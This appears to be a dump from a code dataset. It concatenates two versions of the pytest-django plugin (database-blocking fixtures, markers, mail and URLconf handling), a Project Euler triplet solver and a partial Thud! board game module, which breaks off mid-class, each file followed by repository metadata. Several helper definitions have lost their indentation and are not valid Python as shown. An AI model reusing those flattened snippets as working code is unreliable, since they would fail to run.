    """Implement the django_db marker, internal to pytest-django.
    This will dynamically request the ``db``, ``transactional_db`` or
    ``django_db_reset_sequences`` fixtures as required by the django_db marker.
    """
    marker = request.node.get_closest_marker("django_db")
    if marker:
        transaction, reset_sequences = validate_django_db(marker)
        # reset_sequences takes priority over the plain transaction flag.
        if reset_sequences:
            request.getfixturevalue("django_db_reset_sequences")
        elif transaction:
            request.getfixturevalue("transactional_db")
        else:
            request.getfixturevalue("db")
@pytest.fixture(autouse=True, scope="class")
def _django_setup_unittest(request, django_db_blocker):
    """Setup a django unittest, internal to pytest-django."""
    if not django_settings_is_configured() or not is_django_unittest(request):
        yield
        return
    # Fix/patch pytest.
    # Before pytest 5.4: https://github.com/pytest-dev/pytest/issues/5991
    # After pytest 5.4: https://github.com/pytest-dev/pytest-django/issues/824
    from _pytest.monkeypatch import MonkeyPatch
    def non_debugging_runtest(self):
        # Run the TestCase directly, bypassing pytest's debug wrapper.
        self._testcase(result=self)
    mp_debug = MonkeyPatch()
    mp_debug.setattr("_pytest.unittest.TestCaseFunction.runtest", non_debugging_runtest)
    request.getfixturevalue("django_db_setup")
    cls = request.node.cls
    # Run setUpClass/tearDownClass with DB access unblocked.
    with django_db_blocker.unblock():
        if _handle_unittest_methods:
            # Old pytest: temporarily restore the real classmethods that
            # _disable_class_methods no-op'd, run them around the tests.
            _restore_class_methods(cls)
            cls.setUpClass()
            _disable_class_methods(cls)
            yield
            _restore_class_methods(cls)
            cls.tearDownClass()
        else:
            yield
    if mp_debug:
        mp_debug.undo()
@pytest.fixture(scope="function", autouse=True)
def _dj_autoclear_mailbox():
    """Empty Django's test mail outbox before each test."""
    if not django_settings_is_configured():
        return
    from django.core import mail
    # Clear in place so existing references to mail.outbox stay valid.
    del mail.outbox[:]
@pytest.fixture(scope="function")
def mailoutbox(django_mail_patch_dns, _dj_autoclear_mailbox):
    """Expose Django's ``mail.outbox`` (cleared per test, DNS name pinned)."""
    if not django_settings_is_configured():
        return
    from django.core import mail
    return mail.outbox
@pytest.fixture(scope="function")
def django_mail_patch_dns(monkeypatch, django_mail_dnsname):
    """Patch django.core.mail.message.DNS_NAME to a fixed hostname
    (presumably used when generating message IDs -- verify in Django)."""
    from django.core import mail
    monkeypatch.setattr(mail.message, "DNS_NAME", django_mail_dnsname)
@pytest.fixture(scope="function")
def django_mail_dnsname():
    """Hostname substituted for the real DNS name in outgoing test mail."""
    fixed_dnsname = "fake-tests.example.com"
    return fixed_dnsname
@pytest.fixture(autouse=True, scope="function")
def _django_set_urlconf(request):
    """Apply the @pytest.mark.urls marker, internal to pytest-django."""
    marker = request.node.get_closest_marker("urls")
    if marker:
        skip_if_no_django()
        import django.conf
        try:
            from django.urls import clear_url_caches, set_urlconf
        except ImportError:
            # Removed in Django 2.0
            from django.core.urlresolvers import clear_url_caches, set_urlconf
        urls = validate_urls(marker)
        original_urlconf = django.conf.settings.ROOT_URLCONF
        django.conf.settings.ROOT_URLCONF = urls
        # Drop resolver caches and reset any active urlconf override so
        # the new ROOT_URLCONF takes effect immediately.
        clear_url_caches()
        set_urlconf(None)
        def restore():
            django.conf.settings.ROOT_URLCONF = original_urlconf
            # Copy the pattern from
            # https://github.com/django/django/blob/master/django/test/signals.py#L152
            clear_url_caches()
            set_urlconf(None)
        request.addfinalizer(restore)
@pytest.fixture(autouse=True, scope="session")
def _fail_for_invalid_template_variable():
    """Fixture that fails for invalid variables in templates.
    This fixture will fail each test that uses django template rendering
    should a template contain an invalid template variable.
    The fail message will include the name of the invalid variable and
    in most cases the template name.
    It does not raise an exception, but fails, as the stack trace doesn't
    offer any helpful information to debug.
    This behavior can be switched off using the marker:
    ``pytest.mark.ignore_template_errors``
    """
    class InvalidVarException(object):
        """Custom handler for invalid strings in templates."""
        def __init__(self):
            # When True, __mod__ fails the test; the ignore_template_errors
            # marker flips this to False (see
            # _template_string_if_invalid_marker).
            self.fail = True
        def __contains__(self, key):
            """There is a test for '%s' in TEMPLATE_STRING_IF_INVALID."""
            # Pretend to contain '%s' so Django treats us as a format string
            # and calls __mod__ with the variable name.
            return key == "%s"
        @staticmethod
        def _get_origin():
            """Walk the call stack to find the template origin/name."""
            stack = inspect.stack()
            # Try to use topmost `self.origin` first (Django 1.9+, and with
            # TEMPLATE_DEBUG)..
            for f in stack[2:]:
                func = f[3]
                if func == "render":
                    frame = f[0]
                    try:
                        origin = frame.f_locals["self"].origin
                    except (AttributeError, KeyError):
                        continue
                    if origin is not None:
                        return origin
            from django.template import Template
            # finding the ``render`` needle in the stack
            frame = reduce(
                lambda x, y: y[3] == "render" and "base.py" in y[1] and y or x, stack
            )
            # assert 0, stack
            frame = frame[0]
            # finding only the frame locals in all frame members
            f_locals = reduce(
                lambda x, y: y[0] == "f_locals" and y or x, inspect.getmembers(frame)
            )[1]
            # ``django.template.base.Template``
            template = f_locals["self"]
            if isinstance(template, Template):
                return template.name
        def __mod__(self, var):
            """Handle TEMPLATE_STRING_IF_INVALID % var."""
            origin = self._get_origin()
            if origin:
                msg = "Undefined template variable '%s' in '%s'" % (var, origin)
            else:
                msg = "Undefined template variable '%s'" % var
            if self.fail:
                pytest.fail(msg)
            else:
                return msg
    if (
        os.environ.get(INVALID_TEMPLATE_VARS_ENV, "false") == "true"
        and django_settings_is_configured()
    ):
        from django.conf import settings as dj_settings
        # Install the handler where Django will look it up: the TEMPLATES
        # setting when present, the legacy setting otherwise.
        if dj_settings.TEMPLATES:
            dj_settings.TEMPLATES[0]["OPTIONS"][
                "string_if_invalid"
            ] = InvalidVarException()
        else:
            dj_settings.TEMPLATE_STRING_IF_INVALID = InvalidVarException()
@pytest.fixture(autouse=True)
def _template_string_if_invalid_marker(request):
    """Apply the @pytest.mark.ignore_template_errors marker,
    internal to pytest-django."""
    marker = request.keywords.get("ignore_template_errors", None)
    if os.environ.get(INVALID_TEMPLATE_VARS_ENV, "false") == "true":
        if marker and django_settings_is_configured():
            from django.conf import settings as dj_settings
            # Flip the InvalidVarException installed by
            # _fail_for_invalid_template_variable into non-failing mode.
            if dj_settings.TEMPLATES:
                dj_settings.TEMPLATES[0]["OPTIONS"]["string_if_invalid"].fail = False
            else:
                dj_settings.TEMPLATE_STRING_IF_INVALID.fail = False
@pytest.fixture(autouse=True, scope="function")
def _django_clear_site_cache():
    """Clears ``django.contrib.sites.models.SITE_CACHE`` to avoid
    unexpected behavior with cached site objects.
    """
    if django_settings_is_configured():
        from django.conf import settings as dj_settings
        # Only relevant when the sites framework is installed.
        if "django.contrib.sites" in dj_settings.INSTALLED_APPS:
            from django.contrib.sites.models import Site
            Site.objects.clear_cache()
# ############### Helper Functions ################
class _DatabaseBlockerContextManager(object):
def __init__(self, db_blocker):
self._db_blocker = db_blocker
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
self._db_blocker.restore()
class _DatabaseBlocker(object):
    """Manager for django.db.backends.base.base.BaseDatabaseWrapper.
    This is the object returned by django_db_blocker.
    """
    def __init__(self):
        # Stack of previously-installed ensure_connection callables so
        # block()/unblock() calls nest and restore() pops back one level.
        self._history = []
        self._real_ensure_connection = None
    @property
    def _dj_db_wrapper(self):
        from django.db.backends.base.base import BaseDatabaseWrapper
        # The first time the _dj_db_wrapper is accessed, we will save a
        # reference to the real implementation.
        if self._real_ensure_connection is None:
            self._real_ensure_connection = BaseDatabaseWrapper.ensure_connection
        return BaseDatabaseWrapper
    def _save_active_wrapper(self):
        # Push the currently-installed ensure_connection for restore().
        return self._history.append(self._dj_db_wrapper.ensure_connection)
    def _blocking_wrapper(*args, **kwargs):
        # Accepts any arguments: when installed as ensure_connection it is
        # called with the database wrapper instance.
        __tracebackhide__ = True
        __tracebackhide__  # Silence pyflakes
        raise RuntimeError(
            "Database access not allowed, "
            'use the "django_db" mark, or the '
            '"db" or "transactional_db" fixtures to enable it.'
        )
    def unblock(self):
        """Enable access to the Django database."""
        self._save_active_wrapper()
        self._dj_db_wrapper.ensure_connection = self._real_ensure_connection
        return _DatabaseBlockerContextManager(self)
    def block(self):
        """Disable access to the Django database."""
        self._save_active_wrapper()
        self._dj_db_wrapper.ensure_connection = self._blocking_wrapper
        return _DatabaseBlockerContextManager(self)
    def restore(self):
        # Reinstall whatever was active before the last block()/unblock().
        self._dj_db_wrapper.ensure_connection = self._history.pop()
# Single shared blocker used by _setup_django() and django_db_blocker.
_blocking_manager = _DatabaseBlocker()
def validate_django_db(marker):
    """Validate the django_db marker.

    Checks the marker's call signature and returns a
    ``(transaction, reset_sequences)`` pair taken from its arguments.
    A sequence reset is only allowed when combined with a transaction.
    """
    def _signature(transaction=False, reset_sequences=False):
        return transaction, reset_sequences

    # A bad signature surfaces as a TypeError, exactly as if the marker
    # had been a real function call.
    return _signature(*marker.args, **marker.kwargs)
def validate_urls(marker):
    """Validate the urls marker.

    Checks the marker's call signature and returns the ``urls`` value
    taken from its arguments.
    """
    def _signature(urls):
        return urls

    # A bad signature surfaces as a TypeError, exactly as if the marker
    # had been a real function call.
    return _signature(*marker.args, **marker.kwargs)
| {
"repo_name": "cloudera/hue",
"path": "desktop/core/ext-py/pytest-django-3.10.0/pytest_django/plugin.py",
"copies": "2",
"size": "25188",
"license": "apache-2.0",
"hash": -1936636759860216800,
"line_mean": 29.567961165,
"line_max": 88,
"alpha_frac": 0.6276798475,
"autogenerated": false,
"ratio": 4.063236005807388,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5690915853307388,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import os
import sys
import types
import py
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, _live_server_helper, admin_client,
admin_user, client, db, django_user_model,
django_username_field, live_server, rf, settings,
transactional_db)
from .lazy_django import django_settings_is_configured, skip_if_no_django
# Silence linters for imported fixtures.
(_django_db_setup, _live_server_helper, admin_client, admin_user, client, db,
django_user_model, django_username_field, live_server, rf, settings,
transactional_db)
# Environment variables consulted/set when configuring Django.
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
# ############### pytest hooks ################
def pytest_addoption(parser):
    """Register pytest-django's command-line options and ini settings."""
    group = parser.getgroup('django')
    group._addoption('--reuse-db',
                     action='store_true', dest='reuse_db', default=False,
                     help='Re-use the testing database if it already exists, '
                          'and do not remove it when the test finishes. This '
                          'option will be ignored when --no-db is given.')
    group._addoption('--create-db',
                     action='store_true', dest='create_db', default=False,
                     help='Re-create the database, even if it exists. This '
                          'option will be ignored if not --reuse-db is given.')
    group._addoption('--ds',
                     action='store', type='string', dest='ds', default=None,
                     help='Set DJANGO_SETTINGS_MODULE.')
    group._addoption('--dc',
                     action='store', type='string', dest='dc', default=None,
                     help='Set DJANGO_CONFIGURATION.')
    group._addoption('--nomigrations',
                     action='store_true', dest='nomigrations', default=False,
                     help='Disable Django 1.7 migrations on test setup')
    parser.addini(CONFIGURATION_ENV,
                  'django-configurations class to use by pytest-django.')
    group._addoption('--liveserver', default=None,
                     help='Address and port for the live_server fixture.')
    parser.addini(SETTINGS_MODULE_ENV,
                  'Django settings module to use by pytest-django.')
    parser.addini('django_find_project',
                  'Automatically find and add a Django project to the '
                  'Python path.',
                  default=True)
def _exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
# User-facing messages produced by the manage.py project scan
# (_add_django_project_to_path); pytest_load_initial_conftests attaches
# the chosen one to any settings ImportError.
PROJECT_FOUND = ('pytest-django found a Django project in %s '
                 '(it contains manage.py) and added it to the Python path.\n'
                 'If this is wrong, add "django_find_project = false" to '
                 'pytest.ini and explicitly manage your Python path.')
PROJECT_NOT_FOUND = ('pytest-django could not find a Django project '
                     '(no manage.py file could be found). You must '
                     'explicitly add your Django project to the Python path '
                     'to have it picked up.')
PROJECT_SCAN_DISABLED = ('pytest-django did not search for Django '
                         'projects since it is disabled in the configuration '
                         '("django_find_project = false")')
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + '\n\n') if e.args else ''
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
    """Scan *args* (or the cwd when empty) for a directory containing
    manage.py and prepend the first match to sys.path.

    Returns PROJECT_FOUND % base on success, PROJECT_NOT_FOUND otherwise.
    """
    # Command-line options are not paths.
    args = [x for x in args if not str(x).startswith("-")]
    if not args:
        args = [py.path.local()]
    for arg in args:
        arg = py.path.local(arg)
        # parts(reverse=True) presumably walks from the path itself toward
        # the filesystem root, so the closest enclosing project wins --
        # verify against the py.path.local API.
        for base in arg.parts(reverse=True):
            manage_py_try = base.join('manage.py')
            if _exists(manage_py_try):
                sys.path.insert(0, str(base))
                return PROJECT_FOUND % base
    return PROJECT_NOT_FOUND
def _setup_django():
    """Initialize Django's app registry.

    Uses django.setup() when available (Django >= 1.7); on older versions
    falls back to forcing model loading via get_models().
    """
    import django
    if hasattr(django, 'setup'):
        django.setup()
    else:
        # Emulate Django 1.7 django.setup() with get_models
        from django.db.models import get_models
        get_models()
def _parse_django_find_project_ini(x):
if x in (True, False):
return x
x = x.lower()
possible_values = {'true': True,
'false': False,
'1': True,
'0': False}
try:
return possible_values[x]
except KeyError:
raise ValueError('%s is not a valid value for django_find_project. '
'It must be one of %s.'
% (x, ', '.join(possible_values.keys())))
def pytest_load_initial_conftests(early_config, parser, args):
    """Configure Django before conftest files are imported.

    Registers the plugin's markers, optionally locates a Django project
    on disk, resolves DJANGO_SETTINGS_MODULE / DJANGO_CONFIGURATION from
    the command line, environment and ini file (in that priority order),
    and finally forces the settings to load.
    """
    # Register the marks
    early_config.addinivalue_line(
        'markers',
        'django_db(transaction=False): Mark the test as using '
        'the django test database. The *transaction* argument marks will '
        "allow you to use real transactions in the test like Django's "
        'TransactionTestCase.')
    early_config.addinivalue_line(
        'markers',
        'urls(modstr): Use a different URLconf for this test, similar to '
        'the `urls` attribute of Django `TestCase` objects. *modstr* is '
        'a string specifying the module of a URL config, e.g. '
        '"my_app.test_urls".')

    options = parser.parse_known_args(args)

    django_find_project = _parse_django_find_project_ini(
        early_config.getini('django_find_project'))

    if django_find_project:
        _django_project_scan_outcome = _add_django_project_to_path(args)
    else:
        _django_project_scan_outcome = PROJECT_SCAN_DISABLED

    # Configure DJANGO_SETTINGS_MODULE
    # Priority: command line > environment > ini file.
    ds = (options.ds or
          os.environ.get(SETTINGS_MODULE_ENV) or
          early_config.getini(SETTINGS_MODULE_ENV))

    # Configure DJANGO_CONFIGURATION
    dc = (options.dc or
          os.environ.get(CONFIGURATION_ENV) or
          early_config.getini(CONFIGURATION_ENV))

    if ds:
        os.environ[SETTINGS_MODULE_ENV] = ds

        if dc:
            os.environ[CONFIGURATION_ENV] = dc

            # Install the django-configurations importer
            import configurations.importer
            configurations.importer.install()

        # Forcefully load django settings, throws ImportError or
        # ImproperlyConfigured if settings cannot be loaded.
        from django.conf import settings

        with _handle_import_error(_django_project_scan_outcome):
            # Touching DATABASES triggers the actual settings import; the
            # project-scan outcome is appended to any resulting ImportError.
            settings.DATABASES

        _setup_django()
@pytest.mark.trylast
def pytest_configure():
    """Initialise Django once settings are known to be configured."""
    if not django_settings_is_configured():
        return
    _setup_django()
def pytest_runtest_setup(item):
    """Neutralise setUpClass/tearDownClass on Django TestCase subclasses.

    The real hooks are stashed on the class (once) so that the
    _django_setup_unittest fixture can invoke them at the right point,
    after the test database and environment fixtures are ready.
    """
    if django_settings_is_configured() and is_django_unittest(item):
        cls = item.cls

        # Only patch each class once; the stashed hook is the sentinel.
        if hasattr(cls, '__real_setUpClass'):
            return
        cls.__real_setUpClass = cls.setUpClass
        cls.__real_tearDownClass = cls.tearDownClass
        # Replace both hooks with no-ops bound to the class.
        cls.setUpClass = types.MethodType(lambda cls: None, cls)
        cls.tearDownClass = types.MethodType(lambda cls: None, cls)
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
    """
    Ensure that Django is loaded and has its testing environment setup.

    XXX It is a little dodgy that this is an autouse fixture.  Perhaps
    an email fixture should be requested in order to be able to
    use the Django email machinery just like you need to request a
    db fixture for access to the Django database, etc.  But
    without duplicating a lot more of Django's test support code
    we need to follow this model.
    """
    if django_settings_is_configured():
        from django.conf import settings
        from .compat import setup_test_environment, teardown_test_environment

        # Match Django's own test runner: tests always run with DEBUG off.
        settings.DEBUG = False
        setup_test_environment()
        request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
    """The django cursor wrapper, internal to pytest-django.

    This will globally disable all database access. The object
    returned has a .enable() and a .disable() method which can be used
    to temporarily enable database access.
    """
    if not django_settings_is_configured():
        return None

    # Django 1.7 renamed django.db.backends.util to ...utils.
    try:
        from django.db.backends import utils as utils_module
    except ImportError:
        from django.db.backends import util as utils_module

    manager = CursorManager(utils_module)
    manager.disable()
    request.addfinalizer(manager.restore)
    return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
    """Implement the django_db marker, internal to pytest-django.

    This will dynamically request the ``db`` or ``transactional_db``
    fixtures as required by the django_db marker.
    """
    marker = request.keywords.get('django_db', None)
    if not marker:
        return
    validate_django_db(marker)
    fixture_name = 'transactional_db' if marker.transaction else 'db'
    request.getfuncargvalue(fixture_name)
@pytest.fixture(autouse=True, scope='class')
def _django_setup_unittest(request, _django_cursor_wrapper):
    """Setup a django unittest, internal to pytest-django."""
    if django_settings_is_configured() and is_django_unittest(request):
        # Make sure the test environment and database exist first.
        request.getfuncargvalue('_django_test_environment')
        request.getfuncargvalue('_django_db_setup')

        # Django TestCases need database access, so enable it for the whole
        # class, then run the real setUpClass that pytest_runtest_setup
        # replaced with a no-op.
        _django_cursor_wrapper.enable()
        request.node.cls.__real_setUpClass()

        def teardown():
            # Run the stashed tearDownClass and re-block database access.
            request.node.cls.__real_tearDownClass()
            _django_cursor_wrapper.restore()

        request.addfinalizer(teardown)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox():
    """Clear the django outbox, internal to pytest-django."""
    if not django_settings_is_configured():
        return
    from django.core import mail
    mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
    """Apply the @pytest.mark.urls marker, internal to pytest-django."""
    marker = request.keywords.get('urls', None)
    if not marker:
        return
    skip_if_no_django()
    import django.conf
    from django.core.urlresolvers import clear_url_caches

    validate_urls(marker)
    original_urlconf = django.conf.settings.ROOT_URLCONF
    django.conf.settings.ROOT_URLCONF = marker.urls
    clear_url_caches()

    def restore():
        django.conf.settings.ROOT_URLCONF = original_urlconf

    request.addfinalizer(restore)
# ############### Helper Functions ################
class CursorManager(object):
    """Manager for django.db.backends.util.CursorWrapper.

    This is the object returned by _django_cursor_wrapper.

    If created with None as django.db.backends.util the object is a
    no-op.
    """

    def __init__(self, dbutil):
        self._dbutil = dbutil
        self._real_wrapper = dbutil.CursorWrapper
        self._history = []

    def _save_active_wrapper(self):
        # Push the currently-installed wrapper so restore() can put it
        # back, letting enable()/disable() calls nest.
        return self._history.append(self._dbutil.CursorWrapper)

    def _blocking_wrapper(*args, **kwargs):
        __tracebackhide__ = True
        __tracebackhide__  # Silence pyflakes
        pytest.fail('Database access not allowed, '
                    'use the "django_db" mark to enable it.')

    def _install(self, wrapper):
        # Shared switch: remember the old wrapper, then install the new one.
        self._save_active_wrapper()
        self._dbutil.CursorWrapper = wrapper

    def enable(self):
        """Enable access to the Django database."""
        self._install(self._real_wrapper)

    def disable(self):
        """Disable access to the Django database."""
        self._install(self._blocking_wrapper)

    def restore(self):
        """Reinstall whichever wrapper was active before the last switch."""
        self._dbutil.CursorWrapper = self._history.pop()

    def __enter__(self):
        self.enable()

    def __exit__(self, exc_type, exc_value, traceback):
        self.restore()
def validate_django_db(marker):
    """Validate the django_db marker.

    It checks the signature and creates the `transaction` attribute on
    the marker which will have the correct value.
    """
    def _signature(transaction=False):
        marker.transaction = transaction

    _signature(*marker.args, **marker.kwargs)
def validate_urls(marker):
    """Validate the urls marker.

    It checks the signature and creates the `urls` attribute on the
    marker which will have the correct value.
    """
    def _signature(urls):
        marker.urls = urls

    _signature(*marker.args, **marker.kwargs)
| {
"repo_name": "hoh/pytest-django",
"path": "pytest_django/plugin.py",
"copies": "2",
"size": "13006",
"license": "bsd-3-clause",
"hash": -4472727649412337000,
"line_mean": 31.9265822785,
"line_max": 79,
"alpha_frac": 0.6264800861,
"autogenerated": false,
"ratio": 4.169926258416159,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5796406344516158,
"avg_score": null,
"num_lines": null
} |
# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
#
# a**2 + b**2 = c**2
# For example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2.
#
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
from Problem import Problem
class SpecialPythagoreanTriplet(Problem):
    """Project Euler 9: find the Pythagorean triplet with a + b + c = 1000
    and return the product a*b*c."""

    def __init__(self):
        self.answer = 31875000

    def do(self):
        """Solve the problem and return the product of the triplet."""
        a, b, c = self.find_p_triplet(1000, list(range(1, 1000)))
        return a * b * c

    # check if triplet is pythagorean
    def is_p_triplet(self, triplet):
        """Return True if some ordering of *triplet* satisfies x**2 + y**2 == z**2."""
        x, y, z = triplet
        return (x**2 + y**2 == z**2 or
                x**2 + z**2 == y**2 or
                z**2 + y**2 == x**2)

    def find_p_triplet(self, x, candidates):
        """Return (a, b, c) from *candidates* with a + b + c == x forming a
        Pythagorean triplet, or [] when none exists.

        Fix: the returned third member was hard-coded as ``1000 - (c0 + c1)``
        instead of ``x - (c0 + c1)``, so any call with x != 1000 produced a
        result that did not sum to x.
        """
        for c0 in candidates:
            for c1 in candidates:
                if c0 + c1 >= x:
                    break
                if self.is_p_triplet((c0, c1, x - (c0 + c1))):
                    return c0, c1, x - (c0 + c1)
        return []
| {
"repo_name": "hperreault/ProjectEuler",
"path": "009_SpecialPythagoreanTriplet.py",
"copies": "1",
"size": "1079",
"license": "mit",
"hash": -5948408032026635000,
"line_mean": 26.6666666667,
"line_max": 80,
"alpha_frac": 0.5143651529,
"autogenerated": false,
"ratio": 3.0480225988700567,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8932599844204371,
"avg_score": 0.02595758151313707,
"num_lines": 39
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from array import array
import math
import itertools
class NoMoveException(Exception):
    """Raised when a side has no legal move; carries the offending token."""

    def __init__(self, token):
        super(NoMoveException, self).__init__()
        self.token = token
class InfluenceMap:
    """Scores every square of the 17x17 board by proximity to pieces.

    Squares occupied in *add* radiate positive influence, squares occupied
    in *subtract* radiate negative influence, each over a 7x7 neighbourhood
    with strength 6 // chebyshev-distance.
    """
    BOARD_WIDTH = 17

    def __init__(self, add, subtract):
        # *add*/*subtract* stringify to one '0'/'1' digit per square
        # (presumably Bitboard instances -- their __str__ has that shape).
        imported_board = array('B')
        for x in list(str(add)): imported_board.append(int(x))
        imported_board2 = array('B')
        for x in list(str(subtract)): imported_board2.append(int(x))
        self.influence_map = array('B')
        for x in range(InfluenceMap.BOARD_WIDTH**2): self.influence_map.append(0)
        for i,v in enumerate(imported_board):
            if int(v):
                self.hit(i, 6)
        for i,v in enumerate(imported_board2):
            if int(v):
                self.hit(i, -6)

    def __getitem__(self, key):
        # Direct read access to a square's accumulated influence.
        return self.influence_map[key]

    def hit(self, pos, value=6):
        """Radiate *value* influence from *pos* over offsets -3..+3 in x and y."""
        for i in itertools.product([-3,-2,-1,0,1,2,3], repeat=2):
            try:
                position = (pos + (i[0] * 1) + (i[1] * InfluenceMap.BOARD_WIDTH))
                # Skip the one-square border columns/rows and anything that
                # fell off the board (negative offsets give position < 17).
                if position % 17 == 0 or \
                   position % 17 == 16 or \
                   position < 17 or \
                   position > 271:
                    pass
                else:
                    self.influence_map[position] += value // max(abs(i[0]),abs(i[1]),1)
            except:
                # NOTE(review): influence_map is array('B') (unsigned byte),
                # so this bare except also silently swallows OverflowError
                # when a square would go below 0 or above 255 -- that clamp
                # appears to be load-bearing, not merely defensive.
                pass

    def highest(self, variance_pct=0):
        """Return indices whose score is within *variance_pct* of the maximum."""
        highest = max(self.influence_map)
        candidates = []
        for i,v in enumerate(self.influence_map):
            if v >= highest * (1-variance_pct):
                candidates.append(i)
        return candidates

    def display(self):
        """Print the map as a 17x17 grid (debugging helper)."""
        for i, v in enumerate(self.influence_map):
            if not i % self.BOARD_WIDTH: print()
            print(str(v).rjust(3), end='')
class Bitboard:
    """One side's pieces on a 17x17 board, stored as a single integer mask.

    Square i occupies bit (BOARD_WIDTH**2 - i - 1) of ``value``, so
    ``str(board)[i]`` is '1' exactly when square i is occupied.
    """

    BOARD_WIDTH = 17

    def __init__(self, positions=None):
        """Set a bit for every square index in *positions*.

        Fix: *positions* previously defaulted to a shared mutable list
        ([]); ``None`` keeps the call signature compatible without the
        shared-state hazard.
        """
        self.x, self.value = 0, 0  # self.x is the __next__ cursor
        for i in (positions or ()):
            self.value += 1 << (Bitboard.BOARD_WIDTH**2 - i - 1)

    def __str__(self):
        """Render as BOARD_WIDTH**2 characters of '0'/'1', one per square.

        Negative values (produced by __invert__) are rendered by
        complementing the digits of the magnitude, with the final bit
        forced to '1'.
        """
        s = bin(self.value)
        if s.startswith('-', 0, 1):
            s = s.lstrip('-0b').zfill(Bitboard.BOARD_WIDTH**2)
            s = s.replace('1', '2').replace('0', '1').replace('2', '0')
            return s[:-1] + '1'
        return s.lstrip('0b').zfill(Bitboard.BOARD_WIDTH**2)

    def __len__(self):
        # Population count: number of occupied squares.
        return str(self).lstrip('-0b').count('1')

    def __getitem__(self, key):
        return str(self)[key]

    def __iter__(self):
        # NOTE: iteration state lives on the instance (self.x), so nested
        # iteration over the same board is not supported (kept as-is).
        return self

    def __next__(self):
        self.x += 1
        if self.x > Bitboard.BOARD_WIDTH**2:
            self.x = 0
            raise StopIteration
        return self[self.x - 1]

    def __lshift__(self, other):
        new_board = Bitboard()
        new_board.value = self.value << other
        return new_board

    def __rshift__(self, other):
        new_board = Bitboard()
        new_board.value = self.value >> other
        return new_board

    def __and__(self, other):
        new_board = Bitboard()
        new_board.value = self.value & other.value
        return new_board

    def __or__(self, other):
        new_board = Bitboard()
        new_board.value = self.value | other.value
        return new_board

    def __invert__(self):
        new_board = Bitboard.create(self.value)
        new_board.value = ~new_board.value
        return new_board

    def __bool__(self):
        # A board is truthy when at least one square is occupied.
        return bool(len(self))

    def get_bits(self):
        """Yield the index of every occupied square, in ascending order."""
        for i, v in enumerate(str(self)):
            if int(v):
                yield i

    @staticmethod
    def create(integer):
        """Alternate constructor: wrap a raw integer bitmask."""
        new_board = Bitboard()
        new_board.value = integer
        return new_board
class Ply:
    """Implements game-notation fragments"""

    # Token name (or abbreviation) -> one-letter notation abbreviation.
    abbr = { 'dwarf': 'd', 'd': 'd',
             'troll': 'T', 'T': 'T',
             'thudstone': 'R', 'R': 'R' }
    # File number <-> letter ('I' is skipped, as in traditional notation).
    to_letter = {1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E',
                 6: 'F', 7: 'G', 8: 'H', 9: 'J', 10:'K',
                 11:'L', 12:'M', 13:'N', 14:'O', 15:'P' }
    to_number = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5,
                 'F': 6, 'G': 7, 'H': 8, 'J': 9, 'K': 10,
                 'L': 11,'M': 12,'N': 13,'O': 14,'P': 15 }

    def __init__(self, token, origin, dest, captured=None):
        """Record one move: *token* moves *origin* -> *dest*, taking *captured*.

        Fix: *captured* previously defaulted to a shared mutable list ([]).
        """
        self.token = token
        self.origin = origin
        self.dest = dest
        self.captured = [] if captured is None else captured
        self.score = -100  # AI evaluation; -100 is the "unscored" sentinel

    def __str__(self):
        """Render as notation, e.g. 'dA1-B1' or 'TA1-B1xC1' with captures."""
        def make_capstring(captures):
            cap_string = []
            for cap in captures:
                cap_string.append('x' + self.position_to_notation(cap))
            return ''.join(cap_string)
        return str(self.abbr.get(self.token)) + \
               str(self.position_to_notation(self.origin)) + '-' + \
               str(self.position_to_notation(self.dest)) + \
               make_capstring(self.captured)

    # NOTE(review): equality/ordering compare AI scores, while __hash__
    # mixes board positions -- equal plies need not hash alike (kept as-is).
    def __eq__(self, other):
        # Fix: previously returned True or None; always return a bool.
        return self.score == other.score

    def __lt__(self, other):
        # Fix: previously returned True or None; always return a bool.
        return self.score < other.score

    def __hash__(self):
        # Fix: 'caps' was never initialised and the loop tried to unpack
        # plain ints ('for i,v in self.captured'), so hashing always raised.
        # Pack origin, dest and each captured position into 9-bit slots.
        caps = 0
        for i, v in enumerate(self.captured):
            caps += (v << ((i + 2) * 9))
        return (self.origin) + (self.dest << 9) + caps

    def __bool__(self):
        # A ply is "real" only when all three core fields are present.
        if self.token and self.origin and self.dest:
            return True
        return False

    @staticmethod
    def position_to_tuple(position):
        """Convert a flat 17x17 board index to a (file, rank) pair."""
        rank = position // 17
        file = position - (rank * 17)
        return (file, rank)

    @staticmethod
    def position_to_notation(position):
        """Convert a flat board index to notation such as 'A1'."""
        conv = Ply.position_to_tuple(position)
        file = Ply.to_letter.get(int(conv[0]))
        rank = str(int(conv[1]))
        return file + rank

    @staticmethod
    def notation_to_position(notation):
        """Convert notation such as 'A1' back to a flat board index."""
        file = Ply.to_number.get(notation[0])
        return file + int(notation[1:]) * 17

    @staticmethod
    def tuple_to_position(notation):
        """Convert a (file, rank) pair to a flat board index."""
        return notation[1] * 17 + notation[0]

    @staticmethod
